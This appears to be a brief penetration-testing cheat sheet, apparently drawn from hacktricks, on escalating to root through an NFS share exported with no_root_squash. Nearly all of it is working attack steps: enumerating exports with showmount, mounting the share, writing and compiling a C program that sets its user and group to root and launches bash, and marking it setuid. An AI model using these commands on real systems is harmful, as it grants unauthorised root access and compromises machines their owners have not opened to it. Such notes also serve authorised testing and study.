591 B
591 B
NFS RootSquash
- hacktricks
no_root_squashhas to be as an option on the NFS device
Usage
-
showmount -e <target-IP> -
mkdir /tmp/net_volume -
Connect to NFS share
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
- Create root shell inside the dir of the share
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell